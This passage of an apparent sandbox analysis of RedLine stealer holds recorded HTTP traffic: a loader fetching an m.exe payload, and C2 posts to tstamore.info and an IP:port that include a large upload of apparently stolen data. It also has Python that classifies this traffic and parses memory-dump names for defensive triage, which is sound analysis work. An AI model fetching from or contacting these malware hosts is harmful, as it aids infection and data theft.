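    HttpTx(LOADER, "GET", "http://youwebmaster.net/users/content/id03084901/mmow.txt",
           {"User-Agent": LOADER_UA, "Host": "youwebmaster.net"}, 301,
           {"Location": "http://youwebmaster.net/function/v2tmp/momomoomomom.php"}),
    HttpTx(LOADER, "GET", "http://youwebmaster.net/function/v2tmp/momomoomomom.php",
           {"User-Agent": LOADER_UA, "Host": "youwebmaster.net"}, 200,
           {"Content-Type": "application/octet-stream", "Content-Length": "184832",
            "Content-Disposition": "attachment; filename=m.exe"}),
    HttpTx("AddInProcess32.exe", "POST", "http://tstamore.info//",
           {"SOAPAction": '"http://tempuri.org/Endpoint/GetArguments"',
            "Content-Length": "137"}, 200, {}),
    HttpTx("AddInProcess32.exe", "POST", "http://tstamore.info//",
           {"SOAPAction": '"http://tempuri.org/Endpoint/VerifyScanRequest"',
            "Content-Length": "580396"}, 200, {}),
    HttpTx("2095039246.exe", "POST", "http://168.119.241.77:60932//",
           {"SOAPAction": '"http://tempuri.org/Endpoint/GetUpdates"',
            "Content-Length": "5738751"}, 200, {}),
    HttpTx("2095039246.exe", "GET", "https://api.ip.sb/geoip", {}, 200,
           {"Content-Type": "application/json; charset=utf-8"}),
]

if __name__ == "__main__":
    for tx in SAMPLE:
        print(f"{tx.process:<20} {tx.method} {tx.url:<62} {classify(tx)}")
    print("C2:", sorted(c2_endpoints(SAMPLE)))
```

The SOAPAction match is the durable indicator here: the C2 hosts and ports change per build, and the 2095039246.exe instance even uses an IP:port with no DNS, but the operation names and the bare "//" request path are properties of the RedLine client.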

MITRE ATT&CK Enterprise v6

Downloads

  • memory/1524-147-0x00000000082F0000-0x00000000082F7000-memory.dmp

    Filesize

    28KB

  • memory/1524-134-0x0000000007D50000-0x0000000007D51000-memory.dmp

    Filesize

    4KB

  • memory/1524-146-0x0000000007D30000-0x0000000007D31000-memory.dmp

    Filesize

    4KB

  • memory/1524-145-0x0000000007B30000-0x0000000007B31000-memory.dmp

    Filesize

    4KB

  • memory/1524-139-0x0000000007850000-0x0000000007D4E000-memory.dmp

    Filesize

    5.0MB

  • memory/1524-136-0x00000000078C0000-0x00000000078C1000-memory.dmp

    Filesize

    4KB

  • memory/1524-135-0x00000000078F0000-0x00000000078F1000-memory.dmp

    Filesize

    4KB

  • memory/1524-132-0x0000000000B40000-0x0000000000B41000-memory.dmp

    Filesize

    4KB

  • memory/2960-130-0x00000000057B0000-0x00000000057B1000-memory.dmp

    Filesize

    4KB

  • memory/2960-127-0x0000000005770000-0x0000000005771000-memory.dmp

    Filesize

    4KB

  • memory/2960-125-0x0000000005C70000-0x0000000005C71000-memory.dmp

    Filesize

    4KB

  • memory/2960-137-0x0000000005A20000-0x0000000005A21000-memory.dmp

    Filesize

    4KB

  • memory/2960-138-0x0000000005660000-0x0000000005C66000-memory.dmp

    Filesize

    6.0MB

  • memory/2960-121-0x0000000000400000-0x000000000041C000-memory.dmp

    Filesize

    112KB

  • memory/2960-142-0x0000000007180000-0x0000000007181000-memory.dmp

    Filesize

    4KB

  • memory/2960-143-0x0000000007880000-0x0000000007881000-memory.dmp

    Filesize

    4KB

  • memory/2960-144-0x0000000006AE0000-0x0000000006AE1000-memory.dmp

    Filesize

    4KB

  • memory/2960-126-0x0000000005710000-0x0000000005711000-memory.dmp

    Filesize

    4KB

  • memory/3936-119-0x0000000005590000-0x0000000005591000-memory.dmp

    Filesize

    4KB

  • memory/3936-117-0x0000000000BC0000-0x0000000000BC1000-memory.dmp

    Filesize

    4KB

  • memory/3936-120-0x0000000002DD0000-0x0000000002DD9000-memory.dmp

    Filesize

    36KB

  • memory/4004-148-0x0000000000400000-0x000000000041C000-memory.dmp

    Filesize

    112KB

  • memory/4004-159-0x0000000006680000-0x0000000006681000-memory.dmp

    Filesize

    4KB

  • memory/4004-163-0x0000000005770000-0x0000000005C6E000-memory.dmp

    Filesize

    5.0MB
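
Two of the dumps above cover the same range, 0x400000-0x41C000 (112KB), once in PID 2960 (AddInProcess32.exe) and once in PID 4004 (the second 2095039246.exe); 0x400000 is the default image base of a 32-bit executable, so those two dumps are the candidates for the injected RedLine image and the first ones to hand to a config extractor. The Python below is an added example, not the sandbox's code: it parses the dump names, recomputes the Filesize column and lists ranges shared across PIDs. The name layout is read off the list above; the size formatting is an assumption that reproduces the column for the transcribed entries.

```python
"""Parse sandbox memory-dump names and cross-check them.
Added example (not sandbox code). Name layout:
memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp, as in the list above.
"""
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple, Tuple

DUMP_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
    r"-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$")


class Region(NamedTuple):
    pid: int
    seq: int
    start: int
    end: int

    @property
    def size(self) -> int:
        return self.end - self.start


def parse(name: str) -> Region:
    m = DUMP_RE.match(name)
    if not m:
        raise ValueError(f"not a memory dump name: {name}")
    return Region(int(m["pid"]), int(m["seq"]), int(m["start"], 16), int(m["end"], 16))


def human(size: int) -> str:
    """Units of the report's Filesize column: whole KB below 1 MiB, one decimal above (assumption)."""
    return f"{size / (1 << 20):.1f}MB" if size >= (1 << 20) else f"{size // 1024}KB"


def verify(entries: List[Tuple[str, str]]) -> List[str]:
    """Names whose recomputed size disagrees with the reported Filesize."""
    return [n for n, reported in entries if human(parse(n).size) != reported]


def shared_regions(regions: List[Region]) -> Dict[Tuple[int, int], List[int]]:
    """Identical (start, end) ranges dumped from more than one PID:
    the same image mapped into different processes."""
    by_range: Dict[Tuple[int, int], List[int]] = defaultdict(list)
    for r in regions:
        by_range[(r.start, r.end)].append(r.pid)
    return {k: sorted(v) for k, v in by_range.items() if len(v) > 1}


# Constructed from the Downloads list above (name, reported Filesize).
SAMPLE = [
    ("memory/1524-147-0x00000000082F0000-0x00000000082F7000-memory.dmp", "28KB"),
    ("memory/1524-139-0x0000000007850000-0x0000000007D4E000-memory.dmp", "5.0MB"),
    ("memory/2960-138-0x0000000005660000-0x0000000005C66000-memory.dmp", "6.0MB"),
    ("memory/2960-121-0x0000000000400000-0x000000000041C000-memory.dmp", "112KB"),
    ("memory/2960-126-0x0000000005710000-0x0000000005711000-memory.dmp", "4KB"),
    ("memory/3936-120-0x0000000002DD0000-0x0000000002DD9000-memory.dmp", "36KB"),
    ("memory/4004-148-0x0000000000400000-0x000000000041C000-memory.dmp", "112KB"),
    ("memory/4004-163-0x0000000005770000-0x0000000005C6E000-memory.dmp", "5.0MB"),
]

if __name__ == "__main__":
    print("mismatches:", verify(SAMPLE))
    for (start, end), pids in shared_regions([parse(n) for n, _ in SAMPLE]).items():
        print(f"0x{start:X}-0x{end:X} ({human(end - start)}) in PIDs {pids}")
```

The two 5.0MB regions (PID 1524 and PID 4004) are the same size at different addresses, which is what a large managed module mapped twice looks like; the shared-range check deliberately keys on the exact address pair so that only the image-base dumps are reported.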
